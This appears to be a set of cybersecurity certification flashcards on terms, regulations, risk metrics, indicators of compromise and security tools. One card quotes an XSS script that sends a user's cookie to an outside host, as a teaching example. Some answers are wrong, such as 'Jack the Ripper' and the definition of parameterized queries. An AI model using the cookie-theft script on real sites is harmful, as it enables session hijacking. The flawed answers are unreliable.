system isolation
Isolating systems through the control of communications with the device.
What is the disadvantage of systems that ship with UEFI Secure Boot enabled?
It prevents installing any other operating systems or running any live Linux media.
Define MITRE ATT&CK
Knowledge base of adversary tactics and techniques based on real-world observations. It is an open system, and attack matrices are created for various industries.
_____________ often require that organizations maintain archived data for longer periods.
Legal holds. Data on a legal hold must be properly identified, and the appropriate security controls should be put into place to ensure that the data cannot be tampered with or deleted.
Define copyright
Legal protection that ensures that a work that is authored is protected from any form of reproduction or use without the consent of the copyright holder.
Define Health Insurance Portability and Accountability Act (HIPAA)
Legislation that specifies security protocols for all organizations that handle private health information (PHI)
Define Lessons Learned Report
Lists and discusses what was learned about how and hy the incident occurred and how to prevent it from occurring again.
Business Impact Analysis (BIA)
Lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization
Define Application Log
Log that focuses on the operation of Windows applications. Events in this log are classified as error, warning, or information, depending on the severity of the event.
_______________________ controls are software or hardware components used to restrict access.
Logical, or technical. Specific examples of technical controls are firewalls, IDSs, IPSs, encryption, authentication systems, protocols, auditing and monitoring, biometrics, smart cards, and passwords.
Define Adware
Maleware that monitors browsing habits for the purpose of ad targeting
Define commodity malware
Malware that is widely available for either purchase or by free download. It is not customized or tailored to a specific attack
Rights
Manage who is allowed to perform certain operations on an entire computer or within a domain, rather than a particular object within a computer
Define Infrastructure as Code (IaC)
Manages and provisions computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools
Define Formal Method
Method of software analysis that follows prescribed procedures
Define continuous deployment / delivery
Method to make sure that you can release new changes to your customers quickly in a sustainable way. Continuous deployment goes one step further with every change that passes all stages of your production pipeline being released to your customers
Define active directory (AD)
Microsoft implementation of single sign on (SSO)
Point-to-point tunneling protocol (PPTP)
Microsoft protocol based on PPP that uses built-in Microsoft Point-to-point encryption and can use a number of authentication methods, including CHAP, MS-CHAP, and EAP-TLS
ActiveX, Java, and JavaScript are examples of _______________.
Mobile code. Organizations should exercise caution in allowing the use of mobile code such as ActiveX, Java, and JavaScript. An attacker can easily attach a script to a URL in a web page or e-mail that, when clicked, executes malicious code within the computer's browser.
________________ is a security controls development framework developed by NIST.
NIST SP 800-53 Rev 4. The NIST SP 800-53 Rev 4 framework divides the controls into three classes: technical, operational, and management.
APT attacks are typically sourced from which group of threat actors
Nation-state. Nation-state or state sponsors are usually foreign governments. They are interested in pilfering data, including intellectual property and research and development data, from major manufacturers, tech companies, government agencies, and defense contractors. They have the most resources and are the best organized of any of the threat actor groups.
______________________________ is a technology developed by Cisco that is supported by all major vendors and can be used to collect and subsequently export IP traffic accounting information.
NetFlow. The traffic information is exported using UDP packets to a NetFlow analyzer, which can then organize the information in useful ways.
Define Management Plane
Network architecture plane that administers the router
Define Control Plane
Network architecture plane that carries signaling traffic originating from or destined for a router. This is the information that enables routers to share information and build routing tables
Define data plane
Network architecture plane that carries user traffic; also known as the forwarding plane
___________________ is installed at network egress points near the perimeter, to prevent data exfiltration.
Network data loss prevention (DLP). There are two locations where you can implement DLP: Network DLP: Installed at network egress points near the perimeter, network DLP analyzes network traffic. Endpoint DLP: Endpoint DLP runs on end-user workstations or servers in the organization.
Radio Frequency Identification (RFID)
Object-tracking technology that uses radio frequency chips and readers to manage inventory
Define Dereference
Occurs when a pointer with a value of NULL is used as though it pointed to a valid memory area
true negative
Occurs when a scanner correctly determines that a vulnerability does not exist
true positive
Occurs when a scanner correctly identifies a vulnerability.
Define false negative
Occurs when a scanner does not identify a vulnerability that actually exists
Define false positive
Occurs when a scanner identifies a vulnerability that does not exist
Define Overflow Attack
Occurs when an area of memory of some sort is full and can hold no more information
Define integer overflow
Occurs when math operations try to create a numeric value that is too large for the available space
Define Inference
Occurs when someone has access to information at one level that allows her to infer information about another level
Define Accreditation
Occurs when the adequacy of a system's overall security is accepted by management
Define Legacy Systems
Older systems that may be less secure than newer systems
Wireshark
One of the most widely used network packet sniffers.
Define Directory Traversal
One of the ways malicious individuals are able to access parts of a directory to which they should not have access
The _______________________________________ produces an interception proxy called ZAP
Open Web Application Security Project (OWASP). OWASP produces an interception proxy called Zed Attack Proxy (ZAP).
_______________ is the sequencing of events based on certain parameters by using scripting and scripting tools.
Orchestration. Over time, orchestration has been increasingly used to automate processes that were formerly carried out manually by humans.
______________________ are authentication factors that rely on something you have in your possession
Ownership factors. Ownership factor authentication is authentication that is provided based on something that a person has. This type of authentication is referred to as a Type II authentication factor.
Secured memory
Part of a partition designated as security sensitive
Risk Transfer
Passing on the risk to a third party, such as an insurance company
Nessus Network Monitor is an example of a(n) ___________ scanner
Passive. The biggest benefit of a passive vulnerability scanner is its ability to do its work without impacting the monitored network. Some examples of PVSs are the Nessus Network Monitor (formerly Tenable PVS) and NetScanTools Pro.
Define John the Ripper
Password cracker that can work in Unix/Linux as well as macOS
Define LonWorks/LonTalk3
Peer-to-peer protocol used in building automation; uses port 1679
Define Business Continuity Planning (BCP) committee
Performs vulnerability analysis and risk assessment
Sandboxing
Placing a device or software in an environment separate from the balance of the network
Define Isolation/Sandboxing
Placing malware where it can be safely probed and analyzed
Define Bring Your Own Device (BYOD) Policy
Policy designed to allow personal devices in the network
List at least two advantages of SSL/TLS.
Possible answers are -Data is encrypted. -SSL/TLS is supported on all browsers. -Users can easily identify its use (via https://).
List at least one advantage of IaC
Possible answers are -Lower cost -Faster speed -Risk reduction (remove errors and security violations)
List at least one of the cloud platforms supported by ScoutSuite
Possible answers are as follows: -Amazon Web Services (AWS) -Microsoft Azure -Google Cloud Platform -Alibaba Cloud (alpha) -Oracle Cloud Infrastructure (alpha) ScoutSuite is a data collection tool that allows you to use longitudinal survey panels to track and monitor the cloud environment. It is open source and utilizes APIs made available by the cloud provider.
List at least one security issue with cloud storage.
Possible answers are as follows: -Data breaches: Although cloud providers may include safeguards in service-level agreements (SLAs), ultimately the organization is responsible for protecting its own data, regardless of where it is located. When this data is not in your hands—and you may not even know where it is physically located at any point in time—protecting your data is difficult. -Authentication system failures: These failures allow malicious individuals into the cloud. This issue sometimes is made worse by the organization itself when developers embed credentials and cryptographic keys in source code and leave them in public-facing repositories. -Weak interfaces and APIs: Interfaces and application programming interfaces (APIs) tend to be the most exposed parts of a system because they're usually accessible from the open Internet.
List at least one measure that can help prevent fault injection attack
Possible answers are as follows: -Implement fuzz testing to help identify problems. -Adhere to safe coding and project management practices. -Deploy application-level firewalls.
List at least one of the advantages of the cloud based approach to vulnerability scanning
Possible answers are as follows: Installation costs are low because there is no installation and configuration for the client to complete. Maintenance costs are low because there is only one centralized component to maintain, and it is maintained by the vendor (not the end client). Upgrades are included in a subscription. Costs are distributed among all customers. It does not require the client to provide onsite equipment. In the cloud-based approach, the vulnerability management platform is in the cloud.
Give at least two examples of open-source intelligence data.
Possible answers can include the following: -Print and online media -Internet blogs and discussion groups -Unclassified government data -Academic and professional publications -Industry group data
List at least one disadvantage of packet filtering firewalls.
Possible answers include Cannot prevent: -IP spoofing -Attacks that are specific to an application -Attacks that depend on packet fragmentation -Attacks that take advantage of the TCP handshake
List at least two examples of segmentation.
Possible answers include DMZ, extranet, VLANs, and subnets. One of the best ways to protect sensitive resources is to utilize network segmentation. When you segment a network, you create security zones that are separated from one another by devices such as firewalls and routers that can be used to control the flow of traffic between the zones.
List at least two application-related IoCs.
Possible answers include the following: -Anomalous activity -Introduction of new accounts -Unexpected output -Unexpected outbound communication -Service interruption -Application log
List at least one step in the NIST SP 800-163 Rev 1 process
Possible answers include the following: -Application vetting process -Application intake process -Application testing process -Application approval/rejection process -Results submission process -App Re-Vetting process
List a criteria used by XACML to provide for fine-grained control of activities
Possible answers include the following: -Attributes of the user requesting access (for example, all division managers in London) -The protocol over which the request is made (for example, HTTPS) -The authentication mechanism (for example, requester must be authenticated with a certificate)
List at least two network-related IoCs.
Possible answers include the following: -Bandwidth consumption -Beaconing -Irregular peer-to-peer communication -Scan/sweep -Unusual traffic spike -Common protocol over non-standard port
List at least one password cracking utility.
Possible answers include the following: -Cain and Abel -Jack the Ripper
List at least two threat feed aggregation tools.
Possible answers include the following: -Combine: Gathers threat intelligence feeds from publicly available sources -Palo Alto Networks AutoFocus: Provides intelligence, correlation, added context, and automated prevention workflows -Anomali ThreatStream: Helps deduplicate data, removes false positives, and feeds intelligence to security tools -ThreatQuotient: Helps accelerate security operations with an integrated threat library and shared contextual intelligence -ThreatConnect: Combines external threat data from trusted sources with in-house data
List at least two of the components of SCAP.
Possible answers include the following: -Common Configuration Enumeration (CCE): These are configuration best practice statements maintained by the National Institute of Standards and Technology (NIST). -Common Platform Enumeration (CPE): These are methods for describing and classifying operating systems, applications, and hardware devices. -Common Weakness Enumeration (CWE): These are design flaws in the development of software that can lead to vulnerabilities. -Common Vulnerabilities and Exposures (CVE): These are vulnerabilities in published operating systems and applications software.
List at least one of the roles of senior leadership in incident response.
Possible answers include the following: -Communicate the importance of the incident response plan to all parts of the organization. -Create agreements that detail the authority of the incident response team to take over business systems if necessary. -Create decision systems for determining when key systems must be removed from the network.
List at least one job of the human resources department with regard to incident response.
Possible answers include the following: -Develop job descriptions for those persons who will be hired for positions involved in incident response. -Create policies and procedures that support the removal of employees found to be engaging in improper or illegal activity.
List at least one way the binary malware file can be made readable.
Possible answers include the following: -Disassembly -Decompiling -Debugging
List at least one use of workflow orchestration in the security world.
Possible answers include the following: -Dynamic incident response plans that adapt in real time -Automated workflows to empower analysts and enable faster response
List at least two disadvantages of RADIUS.
Possible answers include the following: -Encrypts only the password in the access request packet -Does not support any of the following: --Apple Remote Access protocol --NetBIOS Frame Protocol Control protocol --X.25 PAD connections -Does not support securing the available commands on routers and switches
List at least one of the contents of a TPM chip.
Possible answers include the following: -Endorsement key (EK): The EK is persistent memory installed by the manufacturer that contains a public/private key pair. -Storage root key (SRK): The SRK is persistent memory that secures the keys stored in the TPM. -Attestation identity key (AIK): The AIK is versatile memory that ensures the integrity of the EK. -Platform configuration register (PCR) hash: A PCR hash is versatile memory that stores data hashes for the sealing function. -Storage keys: A storage key is versatile memory that contains the keys used to encrypt the computer's storage, including hard drives, USB flash drives, and so on.
List at least two forms of code review.
Possible answers include the following: -Formal review: This is an extremely thorough, line-by-line inspection, usually performed by multiple participants using multiple phases. This is the most time-consuming type of code review but the most effective at finding defects. -Lightweight review: This type of code review is much more cursory than a formal review. It is usually done as a normal part of the development process. It can happen in several forms: -Pair programming: Two coders work side by side, checking one another's work as they go. -E-mail review: Code is e-mailed around to colleagues for them to review when time permits. -Over the shoulder: Coworkers review the code while the author explains his or her reasoning. -Tool-assisted: Using automated testing tools is perhaps the most efficient method.
List one way that sessions can be highjacked
Possible answers include the following: -Guessing the session ID: This involves gathering samples of session IDs and guessing a valid ID assigned to another user's session. -Using a stolen session ID: Although TLS/SSL connections hide these IDs, many sites do not require an SSL connection using session ID cookies. They also can be stolen through XSS attacks and by gaining physical access to the cookie stored on a user's computer.
According to the GPDR, personal data may not be processed unless there is at least one legal basis to do so. List at least two of these legal bases.
Possible answers include the following: -If the data subject has given consent to the processing of his or her personal data -To fulfill contractual obligations with a data subject, or for tasks at the request of a data subject who is in the process of entering into a contract -To comply with a data controller's legal obligations -To protect the vital interests of a data subject or another individual -To perform a task in the public interest or in official authority -For the legitimate interests of a data controller or a third party, unless these interests are overridden by interests of the data subject or her or his rights according to the Charter of Fundamental Rights (especially in the case of children)
List at least two threats presented by the introduction of personal mobile devices (smartphones and tablets) into an organization's network
Possible answers include the following: -Insecure web browsing -Insecure Wi-Fi connectivity -Lost or stolen devices holding company data -Corrupt application downloads and installations -Missing security patches -Constant upgrading of personal devices -Use of location services
List at least two measures that should be taken with sheep dip systems.
Possible answers include the following: -Install port monitors to discover ports used by the malware. -Install file monitors to discover what changes may be made to files. -Install network monitors to identify what communications the malware may attempt. -Install one or more antivirus programs to perform malware analysis.
List at least two advantages of the cloud-based approach to vulnerability scanning.
Possible answers include the following: -Installation costs are low because there is no installation and configuration for the client to complete. -Maintenance costs are low because there is only one centralized component to maintain, and it is maintained by the vendor (not the end client). -Upgrades are included in a subscription. -Costs are distributed among all customers. It does not require the client to provide onsite equipment.
List at least two memory-reading tools.
Possible answers include the following: -Memdump: This free tool runs on Windows, Linux, and Solaris. It simply creates a bit-by-bit copy of the volatile memory on a system. -KnTTools: This memory acquisition and analysis tool used with Windows systems captures physical memory and stores it to a removable drive or sends it over the network to be archived on a separate machine. -FATKit: This popular memory forensic tool automates the process of extracting interesting data from volatile memory. FATKit helps an analyst visualize the objects it finds to help in understanding the data that the tool was able to find.
List at least two host-related IoCs.
Possible answers include the following: -Processor consumption -Drive capacity consumption -Unauthorized software -Malicious process -Unauthorized change -Unauthorized privilege -Data exfiltration -Abnormal OS process behavior
List at least two hardening techniques
Possible answers include the following: -Remove unnecessary applications. -Disable unnecessary services. -Block unrequired ports. -Tightly control the connecting of external storage devices and media, if allowed at all.
List at least one of the functions of configuration management.
Possible answers include the following: -Report the status of change processing. -Document the functional and physical characteristics of each configuration item. -Perform information capture and version control. -Control changes to the configuration items, and issue versions of configuration items from the software library.
List and define at least two ways to handle risk.
Possible answers include the following: -Risk avoidance: Terminating the activity that causes a risk or choosing an alternative that is not as risky -Risk transfer: Passing on the risk to a third party, such as an insurance company -Risk mitigation: Defining the acceptable risk level the organization can tolerate and reducing the risk to that level -Risk acceptance: Understanding and accepting the level of risk as well as the cost of damages that can occur
List at least two advantages of circuit-level proxies.
Possible answers include the following: -Secure addresses from exposure -Support a multiprotocol environment -Allow for comprehensive logging
List at least two advantage of REST/JSON over SOAP/XML.
Possible answers include the following: -Size: REST/JSON is a lot smaller and less bloated than SOAP/XML. Therefore, much less data is passed over the network, which is particularly important for mobile devices. -Efficiency: REST/JSON makes it easier to parse data, thereby making it easier to extract and convert the data. As a result, it requires much less from the client's CPU. -Caching: REST/JSON provides improved response times and server loading due to support from caching. -Implementation: REST/JSON interfaces are much easier than SOAP/XML to design and implement.
List at least one example of an IoT deployment.
Possible answers include the following: -Smart home: Includes products that are used in the home. They range from personal assistance devices, such as Amazon Alexa, to HVAC components, such as Nest thermostats. These devices are designed for home management and automation. -Wearables: Includes products that are worn by users. They range from watches, such as the Apple Watch, to personal fitness devices, like the Fitbit. -Smart cities: Includes devices that help resolve traffic congestion issues and reduce noise, crime, and pollution. They include smart energy, smart transportation, smart data, smart infrastructure, and smart mobility devices. -Connected cars: Includes vehicles that include Internet access and data sharing capabilities. Technologies include GPS devices, OnStar, and AT&T connected cars. -Business automation: Includes devices that automate HVAC, lighting, access control, and fire detection for organizations
List at least two types of information available from threat feeds.
Possible answers include the following: -Suspicious domains -Lists of known malware hashes -IP addresses associated with malicious activity
List and describe at least one threat modeling tool.
Possible answers include the following: -Threat Modeling Tool (formerly SDL Threat Modeling Tool) identifies threats based on the STRIDE threat classification scheme. -ThreatModeler identifies threats based on a customizable comprehensive threat library and is intended for collaborative use across all organizational stakeholders. -IriusRisk offers both community and commercial versions of a tool that focuses on the creation and maintenance of a live threat model through the entire SDLC. It connects with several different tools to empower automation. -securiCAD focuses on threat modeling of IT infrastructures using a computer-based design (CAD) approach where assets are automatically or manually placed on a drawing pane. -SD Elements is a software security requirements management platform that includes automated threat modeling capabilities.
List at least one method of data masking.
Possible answers include the following: -Using substitution tables and aliases for the data Redacting or replacing the sensitive data with a random value -Averaging or taking individual values and averaging them (adding them and then dividing by the number of individual values) or aggregating them (totaling them and using only the total value) -Encrypting the data -Hashing the data
List at least two considerations that can be used to determine an asset's value.
Possible answers include the following: -Value to owner -Work required to develop or obtain the asset -Costs to maintain the asset -Damage that would result if the asset were lost -Cost that competitors would pay for the asset -Penalties that would result if the asset were lost
List at least one consideration when assigning a level of criticality.
Possible answers include the following: -Will you be able to recover the data in case of disaster? -How long will it take to recover the data? -What is the effect of this downtime, including loss of public standing?
List and define at least two password policies.
Possible answers include the following: Password life: How long a password will be valid Password history: How long before a password can be reused Authentication period: How long a user can remain logged in Password complexity: How the password will be structured Password length: How long the password must be
List and define at least two forms of social engineering.
Possible answers include the following: Phishing: A social engineering attack in which attackers try to learn personal information, including credit card information and financial data. This type of attack is usually carried out by implementing a fake website that very closely resembles a legitimate website. Users enter data, including credentials, on the fake website, allowing the attackers to capture any information entered. Spear phishing: A phishing attack carried out against a specific target by learning about the target's habits and likes. Spear phishing attacks take longer to carry out than phishing attacks because of the information that must be gathered. Pharming: Similar to phishing, but pharming actually pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site. Shoulder surfing: Occurs when an attacker watches a user enter login or other confidential data. Encourage users to always be aware of who is observing their actions. Implementing privacy screens helps ensure that data entry cannot be recorded. Identity theft: Occurs when someone obtains personal information, including driver's license number, bank account number, and Social Security number, and uses that information to assume an identity of the individual whose information was stolen. After the identity is assumed, the attack can go in any direction. In most cases, attackers open financial accounts in the user's name. Attackers also can gain access to the user's valid accounts. Dumpster diving: Occurs when attackers examine garbage contents to obtain confidential information. This includes personnel information, account login information, network diagrams, and organizational financial data. Organizations should implement policies for shredding documents that contain this information.
List at least two considerations when assigning a level of criticality.
Possible answers including the following: -Will you be able to recover the data in case of disaster? -How long will it take to recover the data? -What is the effect of this downtime, including loss of public standing?
In the following CVSS vector, what does the Pr:L designate? CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N
Pr:L stands for Privileges Required, where L stands for Low and the attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. The Common Vulnerability Scoring System (CVSS) is a system of ranking vulnerabilities that are discovered based on predefined metrics. This system ensures that the most critical vulnerabilities can be easily identified and addressed after a vulnerability test is met.
Define configuration lockdown
Prevents any changes to the configuration of a device, even by users who formerly had the right to configure the device
Define Jailbreaking
Privilege escalation of an Apple device for the purpose of removing software restrictions imposed by Apple
_________________ enables you to look at the graphs that are similar to Task Manager and identify what caused spikes in the past, which is not possible with Task Manager alone.
Process Explorer. Process Explorer is a Sysinternals tool that enables you to see in the Notification area the top CPU offender, without requiring you to open Task Manager.
Define Attestation
Process in which the software and platform components have been identified or "measured, using cryptographic techniques
Define maturity models
Process models developed to help develop security skills
Define active defense
Process of aligning your incident identification and incident response processes such that there is an element of automation built into your reaction to any specific issue
Define Indicator Management
Process of collecting and analyzing indicators of compromise (IOCs)
Define Asset Tagging
Process of placing physical identification numbers of some sort on all assets
Define Advanced Access Content System (AACS)
Protects Blu-ray and HD DVD content. Hackers have been able to obtain the encryption keys to this system
Define Bus Encryption
Protects the data traversing hardware buses
Simple Certificate Enrollment Protocol (SCEP)
Protocol for provisioning certificates to network devices, including mobile devices.
Simple Object Access Protocol (SOAP)
Protocol specification for exchanging structured information in the implementation of web services in computer networks.
Define Layer 2 Tunneling Protocol (L2TP)
Protocol that operates at Layer 2 of the OSI model. Like PPTP, L2TP can use various authentication mechanisms; however, L2TP does not provide any encryption. It is typically used with IPsec.
Define fault tolerance
Provided when a backup component begins operation when the primary component fails
software development life cycle (SDLC)
Provides a predictable framework of procedures designed to identify all requirements with regard to functionality, cost, reliability, and delivery schedule and ensure that each is met in the final solution.
Define NIST SP 800-128
Provides guidance on implementing endpoint protection platforms (EPPs)
Define Federal Privacy Act of 1974
Provides guidelines on collection, maintenance, use, and dissemination of PII about individuals that is maintained in systems of records by federal agencies
United States Federal Sentencing Guidelines of 1991
Provides guidelines to prevent sentencing disparities that existed across the United States.
____________________ assigns monetary and numeric values to all facets of the risk analysis process, including asset value, threat frequency, vulnerability severity, impact, and safeguard costs.
Quantitative risk analysis. Equations are used to determine total and residual risks. An advantage of quantitative over qualitative risk analysis is that quantitative uses less guesswork than qualitative.
Define parameterized queries
Queries that do not require input values or parameters
Define disassembly
Reading the machine code into memory and then outputting each instruction as a text string
Define Internet of Things (IoT)
Refers to a system of interrelated computing devices, mechanical and digital machines, and objects that are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-computer interaction
sensitive personal information (SPI)
Refers to information that does not identify an individual, but is related to an individual and communicates information that is private or could potentially harm an individual should it be made public.
Privacy
Relates to right to control the sharing and use of one's personal information
____________________ involves eliminating any residual danger or damage to the network that still might exist.
Remediation. This step involves eliminating any residual danger or damage to the network that still might exist. For example, in the case of a virus outbreak, it could mean scanning all systems to root out any additional affected machines. These measures are designed to make a more detailed mitigation when time allows.
Define Clearing
Removing data from the media so that it cannot be reconstructed using normal file recovery techniques and tools
Define Hardening
Removing unnecessary functions to reduce the attack surface
_______________ is a client/server model for interacting with content on remote systems, typically using HTTP.
Representational State Transfer (REST). REST involves accessing and modifying existing content and also adding content to a system. REST does not require a specific message format during HTTP resource exchanges.
What intelligence gathering step is necessary because the amount of potential information may be so vast
Requirements. Before beginning intelligence activities, security professionals must identify what the immediate issue is and define as closely as possible the requirements of the information that needs to be collected and analyzed. This means the types of data to be sought is driven by what we might fear the most or by recent breaches or issues. The amount of potential information may be so vast that unless we filter it to what is relevant, we may be unable to fully understand what is occurring in the environment.
Define HIPAA Breach Notification Rule
Requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information (PHI)
Define Federal Information Security Management Act (FISMA) of 2002
Requires all federal agencies to develop, document, and implement an agency wide information security program
Quantitative Risk Analysis
Risk analysis that assigns monetary and numeric values to all facets of the risk analysis process, including asset value, threat frequency, vulnerability severity, impact, and safeguard costs.
Qualitative Risk Analysis
Risk analysis that does not assign monetary and numeric values to all facets of the risk analysis process
Define Forwarding
Routing e-mail through another organization's e-mail system
Define Common Platform Enumeration (CPE)
SCAP component; a NIST standardized method of describing methods for describing and classifying operating systems, applications, and hardware devices
Common Weakness Enumeration (CWE)
SCAP component; an identification scheme for design flaws in the development of software that can lead to vulnerabilities
Define Common Configuration Enumeration (CCE)
SCAP component; configuration best practice statements maintained by the National Institute of Standards and Technology (NIST)
Define Common Vulnerabilities and Exposures (CVE)
SCAP component; list of vulnerabilities in published operating systems and applications software
List at least one SOC report, including what it reports on and who uses it.
SOC 1 Internal controls over financial reporting User auditors and users' controller office SOC 2 Security, availability, processing integrity, confidentiality, or privacy controls Management, regulators, and others; shared NDA SOC 3 Security, availability, processing integrity, confidentiality, or privacy controls Publicly available to anyone
In a(n) _____________________, two firewalls are used, and traffic must be inspected at both firewalls before it can enter the internal network.
Screened subnet. In a screened subnet, two firewalls are used, creating a subnet between them that is screened both from the internal network and the Internet.
Query Writing
Search functions that help to locate the relevant information in log data
_______________ requires that all boot loader components (e.g., OS kernel, drivers) attest to their identity (digital signature) and the attestation is compared to the trusted list.
Secure Boot. Secure Boot requires that all boot loader components are found on the trusted list.
SSL/TLS
Secure Sockets Layer/Transport Layer Security encryption option for creating VPNs. It works at the application layer of the OSI model. It is used mainly to protect HTTP traffic or web servers.
____________________ is a partition designated as security-sensitive.
Secured memory. Based on the nature of data in a partition, the partition can be designated as a security-sensitive or a non-security-sensitive partition. In a security breach (such as tamper detection), the contents of a security-sensitive partition can be erased by the controller itself, while the contents of the non-security-sensitive partitions can remain unchanged.
Define COBIT
Security controls development framework that uses a process model to subdivide IT into four domains
Dynamic ARP Inspection (DAI)
Security feature on CISCO switches which intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC-IP bindings contained in a trusted binding table.
Define Impersonation
Sending e-mail that appears to come from someone else
workflow orchestration
Sequencing of events based on certain parameters by using scripting and scripting tools.
Define containerization
Server virtualization technique in which the kernel allows for multiple isolated user space instances
SOC 1, Type 1 report
Service Organization Control report that focuses on the auditors' opinion of the accuracy and completeness of the data center management's design of controls.
SOC 1, Type 2 report
Service Organization Control report that includes Type 1 and an audit on the effectiveness of controls
Push Notification Services
Services that allow unsolicited messages to be sent by an application to a mobile device even when the application is not open on the device
Define Big Data
Sets of data so large or complex that they cannot be analyzed by using traditional data processing applications
_______________ is a system that has been isolated from the other systems and is used for analyzing suspect files and messages for malware.
Sheep dip system. Another sandboxing option for studying malware is to set up a sheep dip computer.
__________________ is a text messaging service component of most telephone, World Wide Web, and mobile telephony systems.
Short Message Service (SMS) technologies present security challenges. Because messages are sent in clear text, both are susceptible to spoofing and spamming.
static analysis
Software analysis that is conducted without the software running.
With ______________, the vendor provides the entire solution, including the operating system, the infrastructure software, and the application.
Software as a Service (SaaS). With SaaS, the vendor provides an end to end solution. The vendor may provide an email system, for example, in which it hosts and manages everything for the customer.
Define Dynamic Analysis
Software code analysis done with the code executing
Define continuous integration
Software development practice whereby the work of multiple individuals is combined a number of times a ay
Define data loss prevention (DLP)
Software that attempts to prevent data leakage
Define Mobile Code
Software that is transmitted across a network to be executed on a local system
Proprietary systems
Solutions have not been developed by the organization that do not follow standards
Payment Card Industry Data Security Standard (PCI DSS)
Standard that affects any organizations that handle cardholder information for the major credit card companies
___________________ analysis is done without the code executing
Static. Static code analysis is done without the code executing. Code review and testing must occur throughout the entire SDLC.
What is the following script designed to do? 'script' document.location='http://site.comptia/cgi-bin/script. cgi?'+document. cookie 'script'
Steal a cookie from an authenticated user. Many websites allow and even incorporate user input into a web page to customize the web page. If a web application does not properly validate this input, one of two things could happen: the text may be rendered on the page, or a script may be executed when others visit the web page.
Place the following patch management life cycle steps in order: a. Install the patches in the live environment b. Determine the priority of the patches and schedule the patches for deployment c. Ensure that the patches work properly d. Test the patches
Step 1. Determine the priority of the patches and schedule the patches for deployment. Step 2. Test the patches prior to deployment to ensure that they work properly and do not cause system or security issues. Step 3. Install the patches in the live environment. Step 4. After the patches are deployed, ensure that they work properly. To ensure that all devices have the latest patches installed, you should deploy a formal system to ensure that all systems receive the latest updates after thorough testing in a non-production environment.
__________________________ determines the workload that the application can withstand.
Stress testing. Stress testing determines the workload that the application can withstand. These tests should always have defined objectives before testing begins.
____________________ is an open framework that is designed for sharing threat intelligence information in a machine-readable format.
Structured Threat Information eXchange (STIX). While STIX was originally sponsored by the office of Cybersecurity and Communications within the U.S. Department of Homeland Security, it is now under the management of the Organization for the Advancement of Structured Information Standards (OASIS), a nonprofit consortium that seeks to advance the development, convergence, and adoption of open standards for the Internet.
Define Application Wrapping
Technique to protect mobile devices and the data they contain. Application wrappers (implemented as policies) enable administrators to set policies that allow employees with mobile devices to safely download an app, typically from an internal store.
Risk Avoidance
Terminating an activity that causes a risk or choosing an alternative that is not as risky
user acceptance testing
Testing designed to ensure that security features do not make an application unusable from the user perspective.
Recoverability
The ability of a function or system to be recovered in the event of a disaster or disruptive event
Define geofencing
The application of geographic limits to where a device can be used
Define Application Programming Interface (API) Integration
The applications on either end of the API are synchronized and protecting the integrity of the information that passes through the API. It also enables proper updating and versioning required in many environments.
Scope
The areas to be included in a scan; determines the impact and is a function of how widespread the incident is.
Define Mean Time to Repair (MTTR)
The average time required to repair a single resource or function
Define Data Sovereignty
The concept that data stored in digital format is subject to the laws of the country in which the data is located
Define Integrated Intelligence
The consideration and analysis of intelligence data from a perspective that combines multiple data sources and attempts to make inferences based on this data integration.
software defined networking (SDN)
The decoupling of the control plane and data plane in networking by locating the logic of routers and switches into a central controller and locating simple data forwarding in the physical devices.
Define Destruction
The destroying of the media on which data resides
work recovery time (WRT)
The difference between the recovery time objective (RTO) and the maximum tolerable downtime (MTD), which is the remaining time that is left over after the RTO before reaching the MTD.
Define Certificate Authority (CA)
The entity in a PKI that creates and signs digital certificates, maintains the certificates, and revokes them when necessary
Registration Authority (RA)
The entity in a PKI that verifies the requestor's identity and registers the requestor
Define Annualized Rate of Occurrence (ARO)
The estimate of how often a given threat might occur annually
Define Mean Time Between Failures (MTBF)
The estimated amount of time a device will operate before a failure occurs
Define Annual Loss Expectancy (ALE)
The expected risk factor of an annual threat event. Calculated as the single loss expectancy (SLE) times the annualized rate of occurrence (ARO)
Define Federal Intelligence Surveillance Act (FISA) of 1978
The first act to give procedures for the physical and electronic surveillance and collection of "foreign intelligence information" between "foreign powers" and "agents of foreign powers" and applied only to traffic within the United States. It was amended by the USA PATRIOT Act of 2001 and the FISA Amendments Act of 2008.
Define Computer Security Act of 1987
The first law to require a formal computer security plan. It was written to protect and defend the sensitive information in the federal government systems. Superseded in 2002 by the Federal Information Security Management Act (FISMA)
Roots of Trust (RoTs)
The foundation of assurance of the trustworthiness of a mobile device.
List the four main steps of the BIA in order.
The four main steps of the BIA are as follows: -Identify critical processes and resources. -Identify outage impacts and estimate downtime. -Identify resource requirements. -Identify recovery priorities.
Define ISO/IEC 27001:2013
The latest version of the 27001 standard, one of the most popular standards by which organizations obtain certification for information security. It provides guidance on ensuring that an organization's information security management system (ISMS) is properly built, established, maintained, and continually improved.
Define ISO/IEC 27002:2013
The latest version of the ISO/IEC 27002 standard that provides a code of practice for information security management
Define maximum tolerable downtime (MTD)
The maximum amount of time that an organization can tolerate a single resource or function being down
Personal Health Information (PHI)
The medical records of individuals; also referred to as protected health information
List the military/government data classification levels in order.
The military/government data classification levels in order are as follows: -Top secret: Data that is top secret includes weapon blueprints, technology specifications, spy satellite information, and other military information that could gravely damage national security if disclosed. -Secret: Data that is secret includes deployment plans, missile placement, and other information that could seriously damage national security if disclosed. -Confidential: Data that is confidential includes patents, trade secrets, and other information that could seriously affect the government if unauthorized disclosure occurred. -Sensitive but unclassified: Data that is sensitive but unclassified includes medical or other personal data that might not cause serious damage to national security but could cause citizens to question the reputation of the government. -Unclassified: Military and government information that does not fall into any of the other four categories is considered unclassified and usually has to be granted to the public based on the Freedom of Information Act.
List the common sharing models used in TAXII
The models are as follows: Hub and spoke: One central clearinghouse Source/subscriber: One organization is the single source of information Peer-to-peer: Multiple organizations share their information
single loss expectancy (SLE)
The monetary impact of each threat occurrence. Calculated as the asset value (AV) times the exposure factor (EF)
Exposure Factor (EF)
The percentage value or functionality of an asset that will be lost when a threat event occurs
Recovery Point Objective (RPO)
The point in time to which a disrupted resource or function must be returned.
Define geotagging
The process of adding geographical identification metadata to various media
Security Engineering
The process of architecting security features into the design of a system or set of systems.
Define Aggregation
